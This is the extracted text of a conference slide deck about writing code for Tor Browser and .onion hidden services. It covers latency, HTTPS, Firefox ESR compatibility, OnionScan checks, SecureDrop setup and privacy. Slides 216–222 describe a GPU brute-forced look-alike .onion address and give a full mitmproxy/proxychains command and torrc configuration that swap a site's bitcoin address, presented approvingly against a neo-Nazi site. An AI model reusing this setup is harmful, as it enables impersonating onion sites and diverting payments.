Tweet
Tweet

Slide 1

Slide 1 text

How to run your code on the dark web (and why you should)

Slide 2

Slide 2 text

How to run your code on the dark web and why you should

Slide 3

Slide 3 text

How to write your code for the dark web and why you should

Slide 4

Slide 4 text

How to write your code for and why you should

Slide 5

Slide 5 text

is a browser

Slide 6

Slide 6 text

is a browser mostly

Slide 7

Slide 7 text

is a browser patched

Slide 8

Slide 8 text

is a browser patched with The Onion Router

Slide 9

Slide 9 text

patched with The Onion Router Why is ?

Slide 10

Slide 10 text

https://www.eff.org/pages/tor-and-https

Slide 11

Slide 11 text

IP, DNS, & HTTP threats • Hackers-in-the-middle • ISPs snooping on customers’ online activity • Governments censoring sites • Corporations scanning web logs for their competitors’ IP addresses • Criminal sites scanning web logs for law enforcement IP address

Slide 12

Slide 12 text

https://www.eff.org/pages/tor-and-https

Slide 13

Slide 13 text

Note: IP = location https://www.geoiptool.com

Slide 14

Slide 14 text

https://www.eff.org/pages/tor-and-https

Slide 15

Slide 15 text

No content

Slide 16

Slide 16 text

No content

Slide 17

Slide 17 text

No content

Slide 18

Slide 18 text

No content

Slide 19

Slide 19 text

protects the user/pw & data from the intermediaries

Slide 20

Slide 20 text

No content

Slide 21

Slide 21 text

No content

Slide 22

Slide 22 text

No content

Slide 23

Slide 23 text

No content

Slide 24

Slide 24 text

IP, DNS, & HTTP threats • Hackers-in-the-middle • ISPs snooping on customers’ online activity • Governments censoring sites • Corporations scanning web logs for their competitors’ IP addresses • Criminal sites scanning web logs for law enforcement IP address

Slide 25

Slide 25 text

How do we protect
 location + destination from intermediaries?

Slide 26

Slide 26 text

http://www.indiatimes.com/technology/how-to/an-idiot-s-guide-to-vpn-what-it-is-and-why-it-s-important-for-you-256154.html

Slide 27

Slide 27 text

Some are bad

Slide 28

Slide 28 text

Good ones cost $ https://www.privacytools.io/#vpn

Slide 29

Slide 29 text

–Christopher Soghoian, “Your smartphone is a civic rights issue” TED Summit “… there is now increasingly a gap between the privacy and security of the rich, who can afford devices that secure their data by default, and of the poor, whose devices do very little to protect them by default.” https://www.ted.com/talks/glenn_greenwald_why_privacy_matters

Slide 30

Slide 30 text

How else can we protect
 location + destination from intermediaries?

Slide 31

Slide 31 text

is a browser patched with The Onion Router

Slide 32

Slide 32 text

The Onion Router?

Slide 33

Slide 33 text

https://www.torproject.org/about/overview.html.en

Slide 34

Slide 34 text

No content

Slide 35

Slide 35 text

https://www.torproject.org/about/overview.html.en

Slide 36

Slide 36 text

No content

Slide 37

Slide 37 text

No content

Slide 38

Slide 38 text

No content

Slide 39

Slide 39 text

No content

Slide 40

Slide 40 text

No content

Slide 41

Slide 41 text

No content

Slide 42

Slide 42 text

No content

Slide 43

Slide 43 text

Tor protection from DNS + HTTP internet threats • Hackers-in-the-middle • ISPs snooping on customers’ online activity • Governments censoring sites • Corporations scanning web logs for their competitors’ IP addresses • Criminal sites scanning web logs for law enforcement IP address

Slide 44

Slide 44 text

Since Tor routes thru 3 networks …

Slide 45

Slide 45 text

Optimize for latency (You should do this anyway)

Slide 46

Slide 46 text

https://hpbn.co/primer-on-web-performance/#latency-as-a-performance-bottleneck

Slide 47

Slide 47 text

No content

Slide 48

Slide 48 text

Latency Bandwidth

Slide 49

Slide 49 text

on Cached: 0.56s Un-Cached: 1.44s

Slide 50

Slide 50 text

on Cached: 4.38s Un-Cached: 11.99s

Slide 51

Slide 51 text

No content

Slide 52

Slide 52 text

on Cached: 4.53s Un-Cached: 5.12s

Slide 53

Slide 53 text

on Cached: 82.87s Un-Cached: 92.49s

Slide 54

Slide 54 text

21 requests 70 requests

Slide 55

Slide 55 text

Minimize number of requests (You should do this anyway)

Slide 56

Slide 56 text

Make fewer, larger asset bundles https://medium.com/@asyncmax/the-right-way-to-bundle-your-assets-for-faster-sites-over-http-2-437c37efe3ff

Slide 57

Slide 57 text

Make CSS Sprites for images https://css-tricks.com/css-sprites/

Slide 58

Slide 58 text

https://css-tricks.com/css-sprites/

Slide 59

Slide 59 text

Use Data URIs for small images https://css-tricks.com/data-uris/

Slide 60

Slide 60 text

https://css-tricks.com/data-uris/

Slide 61

Slide 61 text

Icon Fonts* for icons https://css-tricks.com/examples/IconFont/

Slide 62

Slide 62 text

https://css-tricks.com/examples/IconFont/

Slide 63

Slide 63 text

Help the browser with Resource hints (You should do this anyway) https://w3c.github.io/resource-hints

Slide 64

Slide 64 text

Use rel=“preload” when you know sprite images will be included https://developer.mozilla.org/docs/Web/HTML/Preloading_content

Slide 65

Slide 65 text

Use rel=“prefetch” when a resource is likely to be included in a future navigation page1.html page2.html https://w3c.github.io/resource-hints/#dfn-prefetch

Slide 66

Slide 66 text

Use rel=“preconnect” when you know a domain may be contacted https://w3c.github.io/resource-hints/#dfn-preconnect

Slide 67

Slide 67 text

(Note: Wait until Q1’18 to do this for Tor)

Slide 68

Slide 68 text

Make CDN work with exit nodes

Slide 69

Slide 69 text

https://support.cloudflare.com/hc/en-us/articles/203306930-Does-CloudFlare-block-Tor-

Slide 70

Slide 70 text

https://support.cloudflare.com/hc/en-us/articles/203306930-Does-CloudFlare-block-Tor-

Slide 71

Slide 71 text

Yay! Your site is faster for users

Slide 72

Slide 72 text

Oh noes! Your users are hacked!

Slide 73

Slide 73 text

Remember these?

Slide 74

Slide 74 text

https://www.torproject.org/about/overview.html.en

Slide 75

Slide 75 text

No content

Slide 76

Slide 76 text

https://www.khanacademy.org/computing/computer-science/cryptography/modern-crypt/v/diffie-hellman-key-exchange-part-1

Slide 77

Slide 77 text

Tor Encryption https://jordan-wright.com/blog/2015/02/28/how-tor-works-part-one/

Slide 78

Slide 78 text

Tor Encryption https://jordan-wright.com/blog/2015/02/28/how-tor-works-part-one/ Note: exit nodes can see the Original Data

Slide 79

Slide 79 text

hacked

Slide 80

Slide 80 text

hacked hacked hacked hacked

Slide 81

Slide 81 text

exit node threats = Man-in-the-Middle threats • exit node snooping on unencrypted data:
 user/password, PII, etc. • Hook browsers with BeEF • Backdoor binaries

Slide 82

Slide 82 text

No content

Slide 83

Slide 83 text

protects the location, destination, user/pw, & data from the intermediaries +

Slide 84

Slide 84 text

Use HTTPS (OMG you should do this anyway!)

Slide 85

Slide 85 text

+

Slide 86

Slide 86 text

brew install certbot sudo certbot certonly --manual —preferred-challenges dns

Slide 87

Slide 87 text

No content

Slide 88

Slide 88 text

Please deploy a DNS TXT record under the name _acme-challenge.www.codesy.io with the following value: CxYdvM…5WvXR0 Once this is deployed, Press ENTER to continue

Slide 89

Slide 89 text

No content

Slide 90

Slide 90 text

No content

Slide 91

Slide 91 text

observatory.mozilla.org

Slide 92

Slide 92 text

No content

Slide 93

Slide 93 text

No content

Slide 94

Slide 94 text

No content

Slide 95

Slide 95 text

Yay! Your code is faster and more secure for users

Slide 96

Slide 96 text

Oh noes! Your code is broken in

Slide 97

Slide 97 text

is a browser patched

Slide 98

Slide 98 text

is a browser patched ESR

Slide 99

Slide 99 text

No content

Slide 100

Slide 100 text

Firefox ESR

Slide 101

Slide 101 text

Make your code work in Firefox ESR (You should do this anyway)

Slide 102

Slide 102 text

Make your code work in all browsers! (You should do this anyway)

Slide 103

Slide 103 text

Download ESR

Slide 104

Slide 104 text

Firefox Dev Tools!

Slide 105

Slide 105 text

caniuse.com

Slide 106

Slide 106 text

No content

Slide 107

Slide 107 text

No content

Slide 108

Slide 108 text

No content

Slide 109

Slide 109 text

MDN Browser Compat

Slide 110

Slide 110 text

kangax.com

Slide 111

Slide 111 text

Coding tools • Autoprefixer • CSSNext • Oldie • PostCSS plugins • Modernizr • @supports

Slide 112

Slide 112 text

Browser CI Platforms • Saucelabs • Browserstack
 
 
 Both include Firefox ESR

Slide 113

Slide 113 text

Yay! Your code works for users ESR

Slide 114

Slide 114 text

Oh noes! Some of your code is still broken in

Slide 115

Slide 115 text

Why is patched ESR

Slide 116

Slide 116 text

https://www.torproject.org/projects/torbrowser/design/

Slide 117

Slide 117 text

Adversary Model • Goals • Capabilities - Positioning • Capabilities - Attacks

Slide 118

Slide 118 text

Adversary Models guide Implementations

Slide 119

Slide 119 text

For example …

Slide 120

Slide 120 text

Someone Confiscates Computer

Slide 121

Slide 121 text

Tor Implementation: Disk Avoidance Confiscate

Slide 122

Slide 122 text

https://gitweb.torproject.org/tor-browser.git/tree/browser/app/profile/000-tor-browser.js?h=tor-browser-52.2.0esr-7.5-1&id=dda0385cc49240f8bd115476c870d61863741f4c

Slide 123

Slide 123 text

So … Tor users will have to sign in every time

Slide 124

Slide 124 text

Another example …

Slide 125

Slide 125 text

No content

Slide 126

Slide 126 text

Fingerprint

Slide 127

Slide 127 text

No content

Slide 128

Slide 128 text

E.g., WebGL Fingerprinting http://cseweb.ucsd.edu/~hovav/dist/canvas.pdf

Slide 129

Slide 129 text

Tor Implementation: Cross-Origin Fingerprinting Unlinkability

Slide 130

Slide 130 text

https://gitweb.torproject.org/tor-browser.git/tree/browser/app/profile/000-tor-browser.js?h=tor-browser-52.2.0esr-7.5-1&id=dda0385cc49240f8bd115476c870d61863741f4c Minimal WebGL No Gamepads Popups open into new tabs UTC timezone No device sensors No WebAudio Windows 7

Slide 131

Slide 131 text

To really debug everything …

Slide 132

Slide 132 text

Download Tor !

Slide 133

Slide 133 text

Tor Dev Tools!

Slide 134

Slide 134 text

Oh noes! Some of your code is STILL broken in

Slide 135

Slide 135 text

No content

Slide 136

Slide 136 text

* * Icon Fonts

Slide 137

Slide 137 text

No JavaScript Slow JavaScript No MathML No SVG No Web Fonts

Slide 138

Slide 138 text

No JavaScript?!

Slide 139

Slide 139 text

No content

Slide 140

Slide 140 text

hacked

Slide 141

Slide 141 text

https://arstechnica.com/security/2013/08/attackers-wield-firefox-exploit-to-uncloak-anonymous-tor-users/

Slide 142

Slide 142 text

https://web.archive.org/web/20130806020101/https://pastebin.mozilla.org/2777139 ESR/Tor

Slide 143

Slide 143 text

Summary • Optimize for latency • Make it work in Firefox (ESR) • (Optional) WITHOUT:
 JavaScript, MathML, SVG, Web Fonts

Slide 144

Slide 144 text

Yay! Your code works* fast* and secure* for users * for some definition of “works|fast|secure”

Slide 145

Slide 145 text

Oh noes! YOU are pwned

Slide 146

Slide 146 text

Oh noes! YOU are pwned if YOU were trying to stay anonymous

Slide 147

Slide 147 text

Now we’re (finally) to the dark web

Slide 148

Slide 148 text

https://www.bibliotecapleyades.net/sociopolitica/sociopol_internet214.htm

Slide 149

Slide 149 text

https://www.quora.com/What-is-the-deep-dark-web-and-how-do-you-access-it

Slide 150

Slide 150 text

https://www.eff.org/pages/tor-and-https

Slide 151

Slide 151 text

https://www.eff.org/pages/tor-and-https

Slide 152

Slide 152 text

No content

Slide 153

Slide 153 text

How do you set up ? Site.com

Slide 154

Slide 154 text

https://domain.me/how-domain-names-work/

Slide 155

Slide 155 text

https://domain.me/how-domain-names-work/

Slide 156

Slide 156 text

https://whois.icann.org/en/domain-name-registration-process

Slide 157

Slide 157 text

Not Anonymous

Slide 158

Slide 158 text

Not Anonymous

Slide 159

Slide 159 text

How do you set up anonymously? Site.com

Slide 160

Slide 160 text

You set up Site.onion

Slide 161

Slide 161 text

is a Tor Hidden Service Site.onion

Slide 162

Slide 162 text

a Tor Hidden Service uses a “rendezvous protocol” instead of DNS

Slide 163

Slide 163 text

https://www.torproject.org/docs/hidden-services.html.en

Slide 164

Slide 164 text

https://www.torproject.org/docs/hidden-services.html.en

Slide 165

Slide 165 text

https://www.torproject.org/docs/hidden-services.html.en

Slide 166

Slide 166 text

reddit.com/r/onions

Slide 167

Slide 167 text

https://www.torproject.org/docs/hidden-services.html.en

Slide 168

Slide 168 text

https://www.torproject.org/docs/hidden-services.html.en

Slide 169

Slide 169 text

https://www.torproject.org/docs/hidden-services.html.en

Slide 170

Slide 170 text

Rendezvous Point

Slide 171

Slide 171 text

is easy to set up! Site.onion

Slide 172

Slide 172 text

1. Run a web server 2. Edit your torrc file 3. Run tor Site.onion

Slide 173

Slide 173 text

No content

Slide 174

Slide 174 text

torrc

Slide 175

Slide 175 text

No content

Slide 176

Slide 176 text

No content

Slide 177

Slide 177 text

No content

Slide 178

Slide 178 text

No content

Slide 179

Slide 179 text

Yay! Your .onion is working!

Slide 180

Slide 180 text

But since
 Tor hidden services hop thru 6 nodes …

Slide 181

Slide 181 text

… really, optimize for latency (You should do this anyway)

Slide 182

Slide 182 text

Optimize for latency • Minimize Requests • Prefer fewer, larger asset bundles • Use CSS Sprites for images • Use Data URIs for small images • Use Icon Fonts • Use Resource Hints • Allow CDN access from Tor nodes

Slide 183

Slide 183 text

… wait … Can you use a CDN with hidden service?

Slide 184

Slide 184 text

Clear-web CDN requests can reveal site owner

Slide 185

Slide 185 text

200ok.us

Slide 186

Slide 186 text

Not Anonymous Not Anonymous DERP!

Slide 187

Slide 187 text

Not Anonym ous

Slide 188

Slide 188 text

https://trac.torproject.org/projects/tor/ticket/9623

Slide 189

Slide 189 text

No Referer

Slide 190

Slide 190 text

Only use public CDN with hidden service?

Slide 191

Slide 191 text

Optimize for latency • Minimize Requests • Use Resource Hints • Only use public CDNs • Probably just don’t use a CDN

Slide 192

Slide 192 text

Oh noes! You are still hacked identified!

Slide 193

Slide 193 text

OnionScan

Slide 194

Slide 194 text

Not Anonymous

Slide 195

Slide 195 text

Get an anonymous email address

Slide 196

Slide 196 text

Encrypted Email privacytools.io

Slide 197

Slide 197 text

No content

Slide 198

Slide 198 text

No content

Slide 199

Slide 199 text

No content

Slide 200

Slide 200 text

Yay! You have anonymous email You should have this anyway

Slide 201

Slide 201 text

Note: Use PGP between email providers

Slide 202

Slide 202 text

Oh noes! You are still hacked identified!

Slide 203

Slide 203 text

May not be Anonymous

Slide 204

Slide 204 text

No content

Slide 205

Slide 205 text

See?

Slide 206

Slide 206 text

No content

Slide 207

Slide 207 text

No content

Slide 208

Slide 208 text

Strip EXIF data from images You should do this anyway

Slide 209

Slide 209 text

Yay! You have location-free images You should probably have this anyway

Slide 210

Slide 210 text

Oh noes! You (and your users) are still hacked identified!

Slide 211

Slide 211 text

May not be Anonymous

Slide 212

Slide 212 text

Obfuscate uploaded file-names You should do this anyway

Slide 213

Slide 213 text

More Checks Apache mod_status leak Open directories Server fingerprints Analytics IDs PGP IDs SSH fingerprints FTP & SMTP banners Cryptocurrency clients IRC, XMPP, VNC, Ricochet

Slide 214

Slide 214 text

Oh noes! Some hacks against your users are “easier” on the dark web.

Slide 215

Slide 215 text

Phishing on the dark web https://pirate.london/intercepting-drug-deals-charity-and-onionland-a2f9bb306b04

Slide 216

Slide 216 text

Brute-force .onion keys + Run MITM Proxy

Slide 217

Slide 217 text

http://www.reuters.com/article/us-virginia-protests-daily-stormer-idUSKCN1AV1HY?il=0

Slide 218

Slide 218 text

BTC address of neo-nazi @$$-holes

Slide 219

Slide 219 text

Use GPU instead of CPU: 115M Hashes/sec 701,505,730,000,000 hashes 1h 41m 9s dstormer65alxsqn.onion

Slide 220

Slide 220 text

proxychains4 \ mitmproxy \ -p 20081 \ -R http://dstormer6em3i4km.onion \ —anticache \ -s “replace_btc.py 19m9yEChBSPuzCzEMmg1dNbPvdLdWA59rS 1CU5YgjquupDw6UeXEyA9VEBH34R7fZ19b” --replace ":~hq .:dstormer65alxsqn.onion:dstormer6em3i4 km.onion" /etc/tor/torrc
 HiddenServiceDir /var/lib/tor/hidden_service/ HiddenServicePort 80 127.0.0.1:20081 /etc/proxychains.conf
 [ProxyList] socks4 127.0.0.1 9050

Slide 221

Slide 221 text

BTC address of tunapanda.org: teaching tech skills to low-income people in east Africa

Slide 222

Slide 222 text

Yay! Nazis are hacked! (Because screw Nazis)

Slide 223

Slide 223 text

Writing code for the dark web is fun

Slide 224

Slide 224 text

Writing code for the dark web makes your code better

Slide 225

Slide 225 text

Writing code for the dark web makes your code better faster more secure more compatible

Slide 226

Slide 226 text

Writing code for the dark web makes you think

Slide 227

Slide 227 text

Writing code for the dark web makes you think about your privacy

Slide 228

Slide 228 text

Writing code for the dark web makes you think about others’ privacy

Slide 229

Slide 229 text

… but wait, isn’t the dark web just for criminals?

Slide 230

Slide 230 text

Yes, there are criminals on the the dark web

Slide 231

Slide 231 text

No content

Slide 232

Slide 232 text

No content

Slide 233

Slide 233 text

traderouteilbgzt.onion

Slide 234

Slide 234 text

… but most of the sites on
 the dark web are not illegal

Slide 235

Slide 235 text

“In February a presentation by INTELLIAGG and DARKSUM reported that they had classified 29,532 onion services and reported that 52% of these sites contained illegal content. … taking into account a 29% duplication rate and at least 10% of traffic being SSH (not to mention the various other protocols) - then we have to conclude that the amount of crime is far lower than the reported 52% figure.” https://mascherari.press/onionscan-report-april-2016-the-tor-network-security-and-crime/

Slide 236

Slide 236 text

the dark web is not illegal tech

Slide 237

Slide 237 text

the dark web is neutral tech

Slide 238

Slide 238 text

the dark web is anonymity tech

Slide 239

Slide 239 text

Clear web sites use
 the dark web

Slide 240

Slide 240 text

No content

Slide 241

Slide 241 text

No content

Slide 242

Slide 242 text

No content

Slide 243

Slide 243 text

No content

Slide 244

Slide 244 text

No content

Slide 245

Slide 245 text

No content

Slide 246

Slide 246 text

http://33y6fjyhs3phzfjj.onion/

Slide 247

Slide 247 text

http://33y6fjyhs3phzfjj.onion/generate

Slide 248

Slide 248 text

No content

Slide 249

Slide 249 text

https://docs.securedrop.org/en/latest/overview.html#infrastructure

Slide 250

Slide 250 text

Hardware • Run your own physical machines to prevent in-memory access by adversaries with physical access • 2 computers for SecureDrop application • 1 computer each for Admin, Journalist, and Secure Viewing Station • 2FA devices (smartphone or yubikey) • Network firewall & 3 ethernet cables • Plenty of USB sticks • Writeable DVD/CD-R discs

Slide 251

Slide 251 text

Create Tails USB sticks • Create Tails USB sticks • Secure Viewing Station • Admin Workstation • Label them immediately

Slide 252

Slide 252 text

No content

Slide 253

Slide 253 text

Set up secure viewing station

Slide 254

Slide 254 text

Set up secure viewing station • Insert & run Secure Viewing Station Tails USB • air-gapped from internet • physically remove other storage & networking • fill ports with epoxy • remove speakers to prevent
 exfiltration of data via ultrasonic audio
 (yes, it’s a thing)

Slide 255

Slide 255 text

Set up transfer device

Slide 256

Slide 256 text

Set up transfer device • encrypt the drive • plug into secure viewing station and journalist station; • check box to remember passphrase

Slide 257

Slide 257 text

Use CD-R/DVD, because BadUSB • “Very widely spread USB controller chips, including those in thumb drives, have no protection from … being reprogrammed” to … • emulate a keyboard and issue commands on behalf of the logged-in user, for example to exfiltrate files or install malware. Such malware, in turn, can infect the controller chips of other USB devices connected to the computer. • detects that the computer is starting up – boot a small virus, which infects the computer’s operating system prior to boot • Once infected, computers and their USB peripherals can never be trusted again.

Slide 258

Slide 258 text

Generate Submission Key (For/from secure viewing station) • Correct system time (to prevent some brute-force shortcuts based on time) • Create the RSA 4096 key (gpg —full-generate-key) • Export public key to transfer device

Slide 259

Slide 259 text

Set up admin workstation

Slide 260

Slide 260 text

Set up admin workstation • Insert & run Admin Workstation Tails USB • Connected to internet via Tor • Download SecureDrop
 git clone https://github.com/freedomofpress/securedrop.git • Download & verify SecureDrop Release Signing Key
 gpg --recv-key "2224 5C81 E3BA EB41 38B3 6061 310F 5612 00F4 AD77" • Verify release tag
 git tag -v 0.4.3
 Good signature from "SecureDrop Release Signing Key" • Create Admin Passphrase Database (KeePassX)

Slide 261

Slide 261 text

Set up (pfSense) firewalls • Admin subnet • Application subnet • Monitor subnet • No DHCP • Static IP for Admin workstation

Slide 262

Slide 262 text

Set up servers

Slide 263

Slide 263 text

Install SecureDrop

Slide 264

Slide 264 text

Set up Authenticated Tor Hidden Services auth-cookie values in torrc

Slide 265

Slide 265 text

…

Slide 266

Slide 266 text

Okay, You’re probably not building SecureDrop

Slide 267

Slide 267 text

But you can respect your users’ privacy

Slide 268

Slide 268 text

“Privacy by Design” https://www.smashingmagazine.com/2017/07/privacy-by-design-framework/

Slide 269

Slide 269 text

Privacy Guidelines for Designing Personalization https://www.smashingmagazine.com/2016/03/privacy-for-personalization/

Slide 270

Slide 270 text

Clumsy transition to preachy privacy part …

Slide 271

Slide 271 text

http://www.slate.com/articles/technology/future_tense/2017/07/women_young_people_experience_the_chilling_effects_of_surveillance_at_higher.html

Slide 272

Slide 272 text

–Trisha Salas @ Thunder Plains 2016 “I want to try Tor … but I heard it puts you on some kind of list … and I plan to travel soon.”

Slide 273

Slide 273 text

–Glenn Greenwald, “Why Privacy Matters” @ TED 2014 “There are dozens of psychological studies that prove that when somebody knows that they might be watched, the behavior they engage in is vastly more conformist and compliant.” https://www.ted.com/talks/glenn_greenwald_why_privacy_matters

Slide 274

Slide 274 text

–Glenn Greenwald, “Why Privacy Matters” @ TED 2014 https://www.ted.com/talks/glenn_greenwald_why_privacy_matters “This realization was exploited most powerfully for pragmatic ends by the 18th-century philosopher Jeremy Bentham, who set out to resolve an important problem ushered in by the industrial age. Where, for the first time, institutions had become so large and centralized that they were no longer able to monitor and therefore control each one of their individual members. And the solution that he devised was an architectural design - originally intended to be implemented in prisons - that he called the panopticon.”

Slide 275

Slide 275 text

–Glenn Greenwald, “Why Privacy Matters” @ TED 2014 https://www.ted.com/talks/glenn_greenwald_why_privacy_matters “The primary attribute of which was the construction of an enormous tower in the center of the institution where whoever controlled the institution could, at any moment, watch any of the inmates, although they couldn’t watch all of them at all times. And crucial to this design was that the inmates could not see into the panopticon, into the tower, and so they never knew if they were being watched.”

Slide 276

Slide 276 text

–Glenn Greenwald, “Why Privacy Matters” @ TED 2014 https://www.ted.com/talks/glenn_greenwald_why_privacy_matters “And what made him so excited about this discovery was that would mean the prisoners would have to assume that they were being watched at any given moment, which would be the ultimate enforcer for obedience and compliance.”

Slide 277

Slide 277 text

–Glenn Greenwald, “Why Privacy Matters” @ TED 2014 https://www.ted.com/talks/glenn_greenwald_why_privacy_matters “The 20th-century French philosopher Michel Foucault realized that model could be used not just for prisons but for every institution that seeks to control human behavior - schools, hospitals, factories, workplaces.”

Slide 278

Slide 278 text

–Glenn Greenwald, “Why Privacy Matters” @ TED 2014 https://www.ted.com/talks/glenn_greenwald_why_privacy_matters “And what he said was that this mindset, this framework discovered by Bentham, was the key means of societal control for modern western societies which no longer need the overt weapons of tyranny - punishing or imprisoning or killing dissidents; or legally compelling loyalty to a particular party … because mass surveillance creates a prison in the mind that is a much more subtle but much more effective means of fostering compliance … much more effective than brute force could ever be.”

Slide 279

Slide 279 text

“There’s a strong physiological basis for privacy. Biologist Peter Watts makes the point that a desire for privacy is innate: mammals in particular don’t respond well to surveillance. We consider it a physical threat, because animals in the natural world are surveilled by predators. –Data and Goliath, by Bruce Schneier

Slide 280

Slide 280 text

“Surveillance makes us feel like prey, just as it makes surveyors act like predators.” –Data and Goliath, by Bruce Schneier

Slide 281

Slide 281 text

No content

Slide 282

Slide 282 text

“… information collection takes place in asymmetrical power relationships: we rarely have a choice as to whether or not we are monitored, what is done with any information that is gathered, or what is done to us on the basis of conclusions drawn from that information.”

Slide 283

Slide 283 text

“One of the benefits of running a Tor relay is the additional layer of confusion it creates: is this traffic starting with you, or are you just passing it along for someone else?”

Slide 284

Slide 284 text

TrackMeNot randomly searches

Slide 285

Slide 285 text

AdNauseam randomly clicks ads

Slide 286

Slide 286 text

No content

Slide 287

Slide 287 text

–me “I have done many weird things with/on Tor and I’ve had no problems traveling.
 
 In fact, using Tor is quite empowering.”

Slide 288

Slide 288 text

Questions? • Optimize for latency • Use HTTPS • Make it work in Firefox ESR • Set up your .onion • OnionScan • Privacy • torproject.org • eff.org • onionscan.org • mascherari.press • speakerdeck.com/ groovecoder